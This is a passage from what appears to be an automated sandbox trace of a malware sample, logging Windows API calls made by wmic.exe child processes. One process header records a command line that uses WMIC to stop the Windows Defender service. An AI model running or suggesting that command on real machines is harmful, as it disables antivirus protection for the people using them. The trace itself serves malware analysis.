uID=0xb3bc, lpBuffer=0x381c0c0, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0292.006] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0292.007] malloc (_Size=0x1c) returned 0x381b9b8 [0292.007] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x381b9b8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0292.007] __iob_func () returned 0x776f2608 [0292.007] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 27 [0292.007] __iob_func () returned 0x776f2608 [0292.007] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0292.008] free (_Block=0x381b9b8) [0292.008] free (_Block=0x381c0c0) [0292.008] ??1CHString@@QAE@XZ () returned 0x1 [0292.008] WbemLocator:IUnknown:Release (This=0x35a1578) returned 0x0 [0292.009] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0292.009] _kbhit () returned 0x0 [0292.017] free (_Block=0x3812ee8) [0292.018] free (_Block=0x381ac90) [0292.018] free (_Block=0x381ab58) [0292.018] free (_Block=0x381ab70) [0292.018] free (_Block=0x381ac78) [0292.018] free (_Block=0x381b058) [0292.018] free (_Block=0x381b188) [0292.018] free (_Block=0x3819da8) [0292.018] free (_Block=0x381b208) [0292.018] free (_Block=0x381acd8) [0292.018] free (_Block=0x3812c20) [0292.018] free (_Block=0x3810520) [0292.018] free (_Block=0x381bc88) [0292.018] free (_Block=0x381abb8) [0292.018] free (_Block=0x381ae70) [0292.018] free (_Block=0x381bc48) [0292.018] free (_Block=0x381bc08) [0292.018] free (_Block=0x381aed0) [0292.018] free (_Block=0x381ae40) [0292.019] free (_Block=0x381ae58) [0292.019] free (_Block=0x381bbd8) [0292.019] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0292.019] free (_Block=0x381b0f0) [0292.019] free (_Block=0x381acc0) [0292.019] free (_Block=0x3810568) [0292.019] free (_Block=0x381abd0) [0292.019] free (_Block=0x381b1c8) [0292.019] free (_Block=0x381ac18) [0292.019] free (_Block=0x3812ba0) [0292.019] free (_Block=0x38126b0) [0292.019] free (_Block=0x38126f8) [0292.019] free (_Block=0x3812740) [0292.019] free (_Block=0x381ae88) [0292.019] free (_Block=0x38127c8) [0292.019] free (_Block=0x3810508) [0292.019] free (_Block=0x38129c0) [0292.019] free (_Block=0x38104f0) [0292.020] free (_Block=0x3812b00) [0292.020] free (_Block=0x38104d8) [0292.020] free (_Block=0x3812ca0) [0292.020] free (_Block=0x3812908) [0292.020] free (_Block=0x3812920) [0292.020] free (_Block=0x38128d0) [0292.020] free (_Block=0x38128e8) [0292.020] free (_Block=0x3812940) [0292.020] free (_Block=0x3812958) [0292.020] free (_Block=0x38104a0) [0292.020] free (_Block=0x38104b8) [0292.020] free (_Block=0x3812860) [0292.020] free (_Block=0x3812878) [0292.020] free (_Block=0x3812828) [0292.020] free (_Block=0x3812840) [0292.021] free (_Block=0x3812898) [0292.021] free (_Block=0x38128b0) [0292.021] free (_Block=0x38127f0) [0292.021] free (_Block=0x3812808) [0292.021] free (_Block=0x38127a0) [0292.021] free (_Block=0x3811200) [0292.021] free (_Block=0x381afd0) [0292.021] WbemLocator:IUnknown:Release (This=0x35447f0) returned 0x2 [0292.021] WbemLocator:IUnknown:Release (This=0x354aeb0) returned 0x0 [0292.022] WbemLocator:IUnknown:Release (This=0x35447f0) returned 0x1 [0292.022] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0292.022] WbemLocator:IUnknown:Release (This=0x35447f0) returned 0x0 [0292.022] free (_Block=0x381ade0) [0292.022] free (_Block=0x381aba0) [0292.023] free (_Block=0x3812ae0) [0292.023] free (_Block=0x381ab28) [0292.023] free (_Block=0x381ac60) [0292.023] free (_Block=0x38129a0) [0292.023] free (_Block=0x381abe8) [0292.023] free (_Block=0x381adb0) [0292.023] free (_Block=0x3812a20) [0292.023] free (_Block=0x381ad08) [0292.023] free (_Block=0x381ad20) [0292.023] free (_Block=0x3812a40) [0292.023] free (_Block=0x381ad68) [0292.023] free (_Block=0x381acf0) [0292.023] free (_Block=0x3812ac0) [0292.024] free (_Block=0x381ad98) [0292.024] free (_Block=0x381ab40) [0292.024] free (_Block=0x3812d20) [0292.024] free (_Block=0x381adf8) [0292.024] free (_Block=0x381ad50) [0292.024] free (_Block=0x3812c00) [0292.024] free (_Block=0x381ac30) [0292.024] free (_Block=0x381ac00) [0292.024] free (_Block=0x3812cc0) [0292.024] free (_Block=0x3819970) [0292.024] free (_Block=0x381ab10) [0292.024] free (_Block=0x3812a60) [0292.024] free (_Block=0x381ad38) [0292.025] free (_Block=0x381aca8) [0292.025] free (_Block=0x3812ce0) [0292.025] free (_Block=0x381ac48) [0292.025] free (_Block=0x381ab88) [0292.025] free (_Block=0x3812b20) [0292.025] free (_Block=0x381adc8) [0292.025] free (_Block=0x381ad80) [0292.025] free (_Block=0x3812a80) [0292.025] free (_Block=0x38198e0) [0292.025] free (_Block=0x38198c8) [0292.025] free (_Block=0x3812d60) [0292.025] free (_Block=0x38197f0) [0292.025] free (_Block=0x3819880) [0292.025] free (_Block=0x3812b40) [0292.025] free (_Block=0x3819808) [0292.025] free (_Block=0x3819928) [0292.025] free (_Block=0x38129e0) [0292.026] free (_Block=0x3819868) [0292.026] free (_Block=0x3819958) [0292.026] free (_Block=0x3812d00) [0292.026] free (_Block=0x38198f8) [0292.026] free (_Block=0x3819850) [0292.026] free (_Block=0x3812a00) [0292.026] free (_Block=0x3819988) [0292.026] free (_Block=0x3819898) [0292.026] free (_Block=0x3812d40) [0292.026] free (_Block=0x38199b8) [0292.026] free (_Block=0x3819820) [0292.026] free (_Block=0x3812be0) [0292.026] free (_Block=0x38198b0) [0292.026] free (_Block=0x3819838) [0292.026] free (_Block=0x3812b60) [0292.026] free (_Block=0x3819910) [0292.026] free (_Block=0x3819940) [0292.026] free (_Block=0x3812aa0) [0292.027] CoUninitialize () [0292.073] exit (_Code=0) [0292.074] free (_Block=0x381aee8) [0292.074] free (_Block=0x3811008) [0292.074] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0292.074] free (_Block=0x3812e10) [0292.074] free (_Block=0x38127e0) [0292.074] free (_Block=0x3810fe8) [0292.074] free (_Block=0x3810fc8) [0292.074] free (_Block=0x3810f98) [0292.074] free (_Block=0x3810f78) [0292.074] free (_Block=0x3810f48) [0292.074] free (_Block=0x3810f08) [0292.074] free (_Block=0x3810ee8) [0292.074] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0292.074] free (_Block=0x3812bc0) Thread: id = 264 os_tid = 0xdbc Thread: id = 265 os_tid = 0x71c Thread: id = 266 os_tid = 0x11f8 Thread: id = 267 os_tid = 0x12b0 Process: id = "23" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x4e484000" os_pid = "0x1230" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 269 os_tid = 0x11f4 [0292.347] GetModuleHandleA (lpModuleName=0x0) returned 0xa20000 [0292.347] __set_app_type (_Type=0x1) [0292.347] __p__fmode () returned 0x776f3c14 [0292.347] __p__commode () returned 0x776f49ec [0292.347] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa59af0) returned 0x0 [0292.347] __wgetmainargs (in: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0, _DoWildCard=0, _StartInfo=0xa681bc | out: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0) returned 0 [0292.348] ??0CHString@@QAE@XZ () returned 0xa685ec [0292.348] malloc (_Size=0x18) returned 0x3420ee8 [0292.348] malloc (_Size=0x38) returned 0x3420f08 [0292.348] malloc (_Size=0x28) returned 0x3420f48 [0292.348] malloc (_Size=0x18) returned 0x3420f78 [0292.349] malloc (_Size=0x24) returned 0x3420f98 [0292.349] malloc (_Size=0x18) returned 0x3420fc8 [0292.349] malloc (_Size=0x18) returned 0x3420fe8 [0292.349] ??0CHString@@QAE@XZ () returned 0xa688fc [0292.349] malloc (_Size=0x18) returned 0x3421008 [0292.349] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0292.349] SetConsoleCtrlHandler (HandlerRoutine=0xa53cc0, Add=1) returned 1 [0292.349] _onexit (_Func=0xa5f370) returned 0xa5f370 [0292.349] _onexit (_Func=0xa5f380) returned 0xa5f380 [0292.349] _onexit (_Func=0xa5f390) returned 0xa5f390 [0292.350] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0292.350] ResolveDelayLoadedAPI () returned 0x74a22590 [0292.350] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0292.355] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0292.369] CoCreateInstance (in: rclsid=0xa26a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa68510 | out: ppv=0xa68510*=0x3244818) returned 0x0 [0292.394] GetCurrentProcess () returned 0xffffffff [0292.394] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x2d6fa04 | out: TokenHandle=0x2d6fa04*=0x194) returned 1 [0292.394] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x2d6fa00 | out: TokenInformation=0x0, ReturnLength=0x2d6fa00) returned 0 [0292.394] malloc (_Size=0x118) returned 0x34226b0 [0292.394] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x34226b0, TokenInformationLength=0x118, ReturnLength=0x2d6fa00 | out: TokenInformation=0x34226b0, ReturnLength=0x2d6fa00) returned 1 [0292.394] AdjustTokenPrivileges (in: TokenHandle=0x194, DisableAllPrivileges=0, NewState=0x34226b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0292.395] free (_Block=0x34226b0) [0292.395] CloseHandle (hObject=0x194) returned 1 [0292.395] malloc (_Size=0x40) returned 0x34226b0 [0292.395] malloc (_Size=0x40) returned 0x34226f8 [0292.395] malloc (_Size=0x40) returned 0x3422740 [0292.395] SetThreadUILanguage (LangId=0x0) returned 0x2f40409 [0292.399] _vsnwprintf (in: _Buffer=0x3422740, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x2d6f98c | out: _Buffer="ms_409") returned 6 [0292.399] malloc (_Size=0x20) returned 0x3421200 [0292.399] GetComputerNameW (in: lpBuffer=0x3421200, nSize=0x2d6f9f0 | out: lpBuffer="NQDPDE", nSize=0x2d6f9f0) returned 1 [0292.399] lstrlenW (lpString="NQDPDE") returned 6 [0292.399] malloc (_Size=0xe) returned 0x3422788 [0292.399] lstrlenW (lpString="NQDPDE") returned 6 [0292.399] ResolveDelayLoadedAPI () returned 0x7444db00 [0292.399] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x2d6fa04 | out: lpNameBuffer=0x0, nSize=0x2d6fa04) returned 0x2f41000 [0292.401] GetLastError () returned 0xea [0292.401] malloc (_Size=0x1e) returned 0x34227a0 [0292.401] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x34227a0, nSize=0x2d6fa04 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x2d6fa04) returned 0x1 [0292.401] lstrlenW (lpString="") returned 0 [0292.401] lstrlenW (lpString="NQDPDE") returned 6 [0292.401] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0292.403] lstrlenW (lpString=".") returned 1 [0292.403] lstrlenW (lpString="NQDPDE") returned 6 [0292.403] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0292.403] lstrlenW (lpString="LOCALHOST") returned 9 [0292.403] lstrlenW (lpString="NQDPDE") returned 6 [0292.403] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0292.403] lstrlenW (lpString="NQDPDE") returned 6 [0292.403] lstrlenW (lpString="NQDPDE") returned 6 [0292.403] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0292.403] free (_Block=0x3422788) [0292.403] lstrlenW (lpString="NQDPDE") returned 6 [0292.403] malloc (_Size=0xe) returned 0x3422788 [0292.403] lstrlenW (lpString="NQDPDE") returned 6 [0292.403] lstrlenW (lpString="NQDPDE") returned 6 [0292.403] malloc (_Size=0xe) returned 0x34227c8 [0292.403] lstrlenW (lpString="NQDPDE") returned 6 [0292.403] malloc (_Size=0x4) returned 0x34227e0 [0292.403] malloc (_Size=0xc) returned 0x34227f0 [0292.403] ResolveDelayLoadedAPI () returned 0x7745b870 [0292.413] malloc (_Size=0x18) returned 0x3422808 [0292.413] malloc (_Size=0xc) returned 0x3422828 [0292.413] SysStringLen (param_1="IDENTIFY") returned 0x8 [0292.413] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0292.413] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0292.413] SysStringLen (param_1="IDENTIFY") returned 0x8 [0292.413] malloc (_Size=0x18) returned 0x3422840 [0292.413] malloc (_Size=0xc) returned 0x3422860 [0292.413] SysStringLen (param_1="IMPERSONATE") returned 0xb [0292.413] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0292.413] SysStringLen (param_1="IMPERSONATE") returned 0xb [0292.413] SysStringLen (param_1="IDENTIFY") returned 0x8 [0292.413] SysStringLen (param_1="IDENTIFY") returned 0x8 [0292.413] SysStringLen (param_1="IMPERSONATE") returned 0xb [0292.413] malloc (_Size=0x18) returned 0x3422878 [0292.413] malloc (_Size=0xc) returned 0x3422898 [0292.413] SysStringLen (param_1="DELEGATE") returned 0x8 [0292.413] SysStringLen (param_1="IDENTIFY") returned 0x8 [0292.413] SysStringLen (param_1="DELEGATE") returned 0x8 [0292.413] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0292.413] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0292.413] SysStringLen (param_1="DELEGATE") returned 0x8 [0292.413] malloc (_Size=0x18) returned 0x34228b0 [0292.413] malloc (_Size=0xc) returned 0x34228d0 [0292.413] malloc (_Size=0x18) returned 0x34228e8 [0292.413] malloc (_Size=0xc) returned 0x3422908 [0292.413] SysStringLen (param_1="NONE") returned 0x4 [0292.413] SysStringLen (param_1="DEFAULT") returned 0x7 [0292.413] SysStringLen (param_1="DEFAULT") returned 0x7 [0292.413] SysStringLen (param_1="NONE") returned 0x4 [0292.413] malloc (_Size=0x18) returned 0x3422920 [0292.413] malloc (_Size=0xc) returned 0x3422940 [0292.413] SysStringLen (param_1="CONNECT") returned 0x7 [0292.414] SysStringLen (param_1="DEFAULT") returned 0x7 [0292.414] malloc (_Size=0x18) returned 0x3422958 [0292.414] malloc (_Size=0xc) returned 0x34204a0 [0292.414] SysStringLen (param_1="CALL") returned 0x4 [0292.414] SysStringLen (param_1="DEFAULT") returned 0x7 [0292.414] SysStringLen (param_1="CALL") returned 0x4 [0292.414] SysStringLen (param_1="CONNECT") returned 0x7 [0292.414] malloc (_Size=0x18) returned 0x34204b8 [0292.414] malloc (_Size=0xc) returned 0x34204d8 [0292.414] SysStringLen (param_1="PKT") returned 0x3 [0292.414] SysStringLen (param_1="DEFAULT") returned 0x7 [0292.414] SysStringLen (param_1="PKT") returned 0x3 [0292.414] SysStringLen (param_1="NONE") returned 0x4 [0292.414] SysStringLen (param_1="NONE") returned 0x4 [0292.414] SysStringLen (param_1="PKT") returned 0x3 [0292.414] malloc (_Size=0x18) returned 0x3422a40 [0292.414] malloc (_Size=0xc) returned 0x34204f0 [0292.414] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0292.414] SysStringLen (param_1="DEFAULT") returned 0x7 [0292.415] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0292.415] SysStringLen (param_1="NONE") returned 0x4 [0292.415] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0292.415] SysStringLen (param_1="PKT") returned 0x3 [0292.415] SysStringLen (param_1="PKT") returned 0x3 [0292.415] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0292.415] malloc (_Size=0x18) returned 0x3422aa0 [0292.415] malloc (_Size=0xc) returned 0x3420508 [0292.415] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0292.415] SysStringLen (param_1="DEFAULT") returned 0x7 [0292.415] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0292.415] SysStringLen (param_1="PKT") returned 0x3 [0292.415] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0292.415] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0292.415] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0292.415] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0292.415] malloc (_Size=0x18) returned 0x3422ae0 [0292.415] malloc (_Size=0x40) returned 0x3420520 [0292.415] malloc (_Size=0x20a) returned 0x34297c8 [0292.415] GetSystemDirectoryW (in: lpBuffer=0x34297c8, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0292.415] free (_Block=0x34297c8) [0292.415] malloc (_Size=0xc) returned 0x3420568 [0292.415] malloc (_Size=0xc) returned 0x3420580 [0292.415] malloc (_Size=0xc) returned 0x3422d80 [0292.415] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0292.415] SysStringLen (param_1="\\wbem\\") returned 0x6 [0292.416] free (_Block=0x3420568) [0292.416] free (_Block=0x3420580) [0292.416] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0292.416] free (_Block=0x3422d80) [0292.416] malloc (_Size=0xc) returned 0x3429898 [0292.416] malloc (_Size=0xc) returned 0x3429868 [0292.416] malloc (_Size=0xc) returned 0x3429880 [0292.416] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0292.416] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0292.416] free (_Block=0x3429898) [0292.416] free (_Block=0x3429868) [0292.416] GetCurrentThreadId () returned 0x11f4 [0292.416] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x2d6f514 | out: phkResult=0x2d6f514*=0x1a0) returned 0x0 [0292.417] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x2d6f520, lpcbData=0x2d6f51c*=0x400 | out: lpType=0x0, lpData=0x2d6f520*=0x30, lpcbData=0x2d6f51c*=0x4) returned 0x0 [0292.417] _wcsicmp (_String1="0", _String2="1") returned -1 [0292.417] _wcsicmp (_String1="0", _String2="2") returned -2 [0292.417] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x2d6f51c*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x2d6f51c*=0x42) returned 0x0 [0292.417] malloc (_Size=0x86) returned 0x3422d80 [0292.417] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x3422d80, lpcbData=0x2d6f51c*=0x42 | out: lpType=0x0, lpData=0x3422d80*=0x25, lpcbData=0x2d6f51c*=0x42) returned 0x0 [0292.417] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0292.417] malloc (_Size=0x42) returned 0x3422e10 [0292.417] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0292.417] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x2d6f520, lpcbData=0x2d6f51c*=0x400 | out: lpType=0x0, lpData=0x2d6f520*=0x36, lpcbData=0x2d6f51c*=0xc) returned 0x0 [0292.417] _wtol (_String="65536") returned 65536 [0292.417] free (_Block=0x3422d80) [0292.417] RegCloseKey (hKey=0x0) returned 0x6 [0292.417] CoCreateInstance (in: rclsid=0xa26ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x2d6f9b0 | out: ppv=0x2d6f9b0*=0x38f45a8) returned 0x0 [0292.434] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x38f45a8, xmlSource=0x2d6f934*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x2d6f99c | out: isSuccessful=0x2d6f99c*=0xffff) returned 0x0 [0292.632] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x38f45a8, DOMElement=0x2d6f9ac | out: DOMElement=0x2d6f9ac*=0x38f6b48) returned 0x0 [0292.632] malloc (_Size=0xc) returned 0x34298e0 [0292.633] IXMLDOMElement:getElementsByTagName (in: This=0x38f6b48, tagName="XSLFORMAT", resultList=0x2d6f9a8 | out: resultList=0x2d6f9a8*=0x38f9ca0) returned 0x0 [0292.634] free (_Block=0x34298e0) [0292.634] IXMLDOMNodeList:get_length (in: This=0x38f9ca0, listLength=0x2d6f9a4 | out: listLength=0x2d6f9a4*=21) returned 0x0 [0292.634] IXMLDOMNodeList:get_item (in: This=0x38f9ca0, index=0, listItem=0x2d6f9c4 | out: listItem=0x2d6f9c4*=0x38f6b88) returned 0x0 [0292.635] IXMLDOMNode:get_text (in: This=0x38f6b88, text=0x2d6f9c8 | out: text=0x2d6f9c8*="texttable.xsl") returned 0x0 [0292.635] IXMLDOMNode:get_attributes (in: This=0x38f6b88, attributeMap=0x2d6f9c0 | out: attributeMap=0x2d6f9c0*=0x38f9fa8) returned 0x0 [0292.635] malloc (_Size=0xc) returned 0x3429988 [0292.635] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x38f9fa8, name="KEYWORD", namedItem=0x2d6f9bc | out: namedItem=0x2d6f9bc*=0x38f9ff8) returned 0x0 [0292.635] free (_Block=0x3429988) [0292.636] IXMLDOMNode:get_nodeValue (in: This=0x38f9ff8, value=0x2d6f97c | out: value=0x2d6f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0292.636] malloc (_Size=0xc) returned 0x3429808 [0292.636] malloc (_Size=0xc) returned 0x3429850 [0292.636] malloc (_Size=0x18) returned 0x3422b40 [0292.636] IUnknown:Release (This=0x38f6b88) returned 0x0 [0292.636] IUnknown:Release (This=0x38f9fa8) returned 0x0 [0292.636] IUnknown:Release (This=0x38f9ff8) returned 0x0 [0292.636] IXMLDOMNodeList:get_item (in: This=0x38f9ca0, index=1, listItem=0x2d6f9c4 | out: listItem=0x2d6f9c4*=0x38f6b88) returned 0x0 [0292.636] IXMLDOMNode:get_text (in: This=0x38f6b88, text=0x2d6f9c8 | out: text=0x2d6f9c8*="textvaluelist.xsl") returned 0x0 [0292.636] IXMLDOMNode:get_attributes (in: This=0x38f6b88, attributeMap=0x2d6f9c0 | out: attributeMap=0x2d6f9c0*=0x38f9fa8) returned 0x0 [0292.637] malloc (_Size=0xc) returned 0x34298e0 [0292.637] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x38f9fa8, name="KEYWORD", namedItem=0x2d6f9bc | out: namedItem=0x2d6f9bc*=0x38f9ff8) returned 0x0 [0292.637] free (_Block=0x34298e0) [0292.637] IXMLDOMNode:get_nodeValue (in: This=0x38f9ff8, value=0x2d6f97c | out: value=0x2d6f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0292.637] malloc (_Size=0xc) returned 0x34298c8 [0292.637] malloc (_Size=0xc) returned 0x3429910 [0292.637] SysStringLen (param_1="VALUE") returned 0x5 [0292.637] SysStringLen (param_1="TABLE") returned 0x5 [0292.637] SysStringLen (param_1="TABLE") returned 0x5 [0292.637] SysStringLen (param_1="VALUE") returned 0x5 [0292.637] malloc (_Size=0x18) returned 0x3422a00 [0292.637] IUnknown:Release (This=0x38f6b88) returned 0x0 [0292.637] IUnknown:Release (This=0x38f9fa8) returned 0x0 [0292.637] IUnknown:Release (This=0x38f9ff8) returned 0x0 [0292.637] IXMLDOMNodeList:get_item (in: This=0x38f9ca0, index=2, listItem=0x2d6f9c4 | out: listItem=0x2d6f9c4*=0x38f6b88) returned 0x0 [0292.638] IXMLDOMNode:get_text (in: This=0x38f6b88, text=0x2d6f9c8 | out: text=0x2d6f9c8*="textvaluelist.xsl") returned 0x0 [0292.638] IXMLDOMNode:get_attributes (in: This=0x38f6b88, attributeMap=0x2d6f9c0 | out: attributeMap=0x2d6f9c0*=0x38f9fa8) returned 0x0 [0292.638] malloc (_Size=0xc) returned 0x34298e0 [0292.638] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x38f9fa8, name="KEYWORD", namedItem=0x2d6f9bc | out: namedItem=0x2d6f9bc*=0x38f9ff8) returned 0x0 [0292.638] free (_Block=0x34298e0) [0292.638] IXMLDOMNode:get_nodeValue (in: This=0x38f9ff8, value=0x2d6f97c | out: value=0x2d6f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0292.638] malloc (_Size=0xc) returned 0x3429958 [0292.638] malloc (_Size=0xc) returned 0x34298f8 [0292.638] SysStringLen (param_1="LIST") returned 0x4 